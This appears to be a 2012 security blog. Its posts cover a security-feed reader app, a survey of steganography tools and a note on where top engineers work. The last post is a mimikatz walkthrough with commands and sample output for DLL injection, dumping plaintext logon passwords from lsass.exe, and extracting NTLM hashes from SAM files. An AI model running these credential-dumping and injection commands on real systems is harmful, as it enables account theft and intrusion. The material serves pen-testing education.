The following screenshots show how the reader woks: Just type on it and it will load security feeds from most of the well-known security web sites. It is extremely easy to use and simple. You won't have any kind of options and no configurations are needed (only Internet is needed). The goal of this very very simple project is to have a "Tap-and-GO" security reader, nothing more nothing less.

If you have your own feed to put on it please feel free to contact me, I'll release some upgrade from time to time, depending of your appreciation. The file you are going to download is a classic IPA file.To install it just use your iTunes ;).

Download !

Have fun !

Friday, March 9, 2012

Steganography Tools: a non exhaustive survey

Yesterday, talking about steganography with CeSeNA group, came out that some people were not familiar with some of the most significative tools in the steganography field. Thanks to Luca Mella, who shared with me a quite exhaustive list, I am going to post some interesting steganography resources to have a place where to find them all.

According to wikipedia Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient, suspects the existence of the message, a form of security through obscurity. In other words the art of hiding informations over the obscurity principle (please don't confuse it with cryptography, which is totally another topic)

The first tool that I am going to list is called: webStego (and its Open version). WebStego offers steganography in bitmaps, text files, HTML files and PDF files. It is has two very user-friendly interfaces and is ideal for securely transmitting data online or adding copyright information, especially with the copyright information manager.

OutGuess is another in great tool to detect steganographic content in images. It implements different steganographic algorithms. Based on clustering techniques it is able to detect on JPEG images the following algorithms: jsteg, jphide (unix and windows), invisible secrets, outguess 01.3b, F5 (header analysis), appendX and camouflage.

Talking about steganography on audio file a great resource is the following one provided by snot monkey. It offers a great survey with the most used techniques such as: LSB Coding, Parity Coding, Phase Coding, Spread Spectrum coding and Echo Hiding. MP3Stego is a tool woking on audio files. Specifically it works on MP3 filetypes. It is able to hide and to extract content from MP3 files.

VSL: Virtual Steganographic Laboratory (VSL) is a graphical block diagramming tool that allows complex using, testing and adjusting of methods both for image steganography and steganalysis. VSL provides simple GUI along with modular, plug-in architecture. 

The Digital Invisible Ink Toolkit is a Java steganography tool that can hide any sort of file inside a digital image (regarding that the message will fit, and the image is 24 bit colour). It works on most of the Operative Systems since Java Based.

Specifically,  Digital Invisible Ink Toolkit has a great analysis feature in which you decide what image to be analyzed, which algorithm to check (even all) anywhere to stamp the results. This tool is great to find out what tripe of steganography has been used in a given image. The following image (click to make it bigger) shows the analysis section.

Another interesting way to hide information is trough the Text. This techniques consists in hiding information into ascii characters. There are several ways to do that such as: (a) hiding information in spaces, (b) tabs and (c) peculation marks. Spammimic is one of the best exponents of this techniques. Finally I conclude this absolutely not exhaustive review of Steganography tools with a website containing most of the stego tools out there. 

Thursday, March 8, 2012

Where are the best engineers ?

I folks, today I came across this interesting paper about the top ranked Engineers in the world. I found it very interesting since "proved" exactly my personals opposite thoughts on this topic (which BTW it is not focused on Security at all), and for such a reason I decide to post it here even if it is a total off topic post.

I don't know why in my mind I always been believing that best Engineers  (obviously I am referring to Computer Engineers ) where in Universities. In my personal ranking list there were something like Stanford, MIT and Berkeley Universities  as places where some of the top Engineers were gathered. My logical flow was pretty clear, best universities produce best engineers this means that best University tends to be rounded by best Engineers. Well I was wrong. Best engineers , like most of the people out there, are attracted by good working positions, which include (but not limited to) good salaries, benefits and free time, and so they tend to "move out" from Universities that often (but not always) are not able to compete with big giants like Apple, Google, Oracle, Microsoft etc... According to this research the top ranked Engineers work for companies and not for Universities as shown in the following fancy diagram.

Personally I think  it is normal, as said, often (but not always) Universities cannot compete with giants in terms of good job positions, so I don't have to say that I agree or that I do not agree. It is a statistic.

As you might see from the above diagram Palantir seems to be the company with the top ranked Engineers. For sure Palantir interview processes are very hard and only a few percentage sees "the end". This is not a surprise for me, Palantir works with "delicate" agencies such as secret services and high finance, they need for sure the top ranked Engineers. Surprisingly (for me) Dropbox engineers come in the second place while Google and Apple are respectively in the 4th and 6th position. Sincerely I  was supposed to see Google and Apple in the top of this list. On the other side the first Universities in the list (with score 77) are Stanford University and MIT. If compared to the companies would be in the 6th position, before Apple and Twitter. This makes me reflecting a lot specifically for European companies and universities ...

Wednesday, February 29, 2012

An interesting tool for your SwissKnife.

Hi folks, 
my past weeks have been quite intensive and busy, unfortunately next weeks seem to follow the same pattern... I am going to travel between conferences and meetings since early April, this could have some influence in my posting frequency. Said that, today I'd like to share a pretty nice tool pointed me out from a student of mine called mimikatz . This windows specific tool helps penetration testers in different ways, specifically it helps pen testers in finding clear text passwords of users logged on windows users and injecting libraries into processes. The author seems to be a french guy who posted examples and test-cases in french language. I am not a native french speaker so I am not going to describe every mimikatz feature (since I could merely understand the one I am going to describe), but rather I am going to describe the ones I believe to be more interesting for pen testers. 

mimikatz::inject. This is the inject functionality implemented in mimikats framework. The inject parameter takes the PID and the library to inject as input parameters. The following example is injecting the kelloworld.dll into the process having PID 3256 which happens to be Microsoft Word processor.

mimikatz # inject::pid 3256 kelloworld.dll 
Attente de connexion du client... 
Serveur connecté à un client !
Message du processus : 
Bienvenue dans un processus distant Gentil Kiwi 

mimikatz # @ping 

 mimikatz # @helloworld

The following example shows hot to use sekurlsa.dll to get windows logon plain text passwords:

mimikatz 1.0 x86 (pre-alpha) /* Traitement du Kiwi */ 
mimikatz # privilege::debug 
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK 

mimikatz # inject::process lsass.exe sekurlsa.dll 
PROCESSENTRY32(lsass.exe).th32ProcessID = 488 
Attente de connexion du client... 
Serveur connecté à un client ! 
Message du processus : 
Bienvenue dans un processus distant Gentil Kiwi 

SekurLSA : librairie de manipulation des données de sécurités dans LSASS 

mimikatz # @getLogonPasswords 

Authentification Id : 0;434898 
Package d'authentification : NTLM 
Utilisateur principal : Gentil User 
Domaine d'authentification : vm-w7-ult 
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : password 
tspkg : password 

Authentification Id : 0;269806 
Package d'authentification : NTLM 
Utilisateur principal : Gentil Kiwi 
Domaine d'authentification : vm-w7-ult 
msv1_0 : lm{ d0e9aee149655a6075e4540af1f22d3b }, ntlm{ cc36cf7a8514893efccd332446158b1a } wdigest : waza1234/ 
 tspkg : waza1234/

This actually makes me reflecting on windows memory management. Since there is no the need of having plaintext passwords in LSASS, indeed it uses hashes and not plain text passwords, it means that the plain text passwords are stuck on the memory in the original input holding variable. This makes me thinking that no memory cleaners are used in windows logon. I am not sure 100%, I could be wrong but if you follows my brainstorming it could be easily this way, which actually is a quite important mistake which allows programs to read logon passwords from memory (as actually is working in this way! ).

The following example shows how to use the hashes functionality to dump SAM hashes:

mimikatz # samdump::hashes z:\windows\system32\config\system z:\windows\system32\config\sam

Ordinateur : VM-W2K8R2-ENT-X 
BootKey : c4ed5743f54e4f1fdc6cca89723335ce 

Rid : 500 
User : Administrateur 
LM : 
NTLM : cc36cf7a8514893efccd332446158b1a 
Rid : 501 
User : Invité 
LM : 

You will find this interesting tool here (it happens to be a french site, but google translator does its job very well). Finally I like and I do suggest to have in your own swiss-knife this interesting tool specially if you need to inject your own DLL into specific PID getting PID's rights. Have a nice hunting !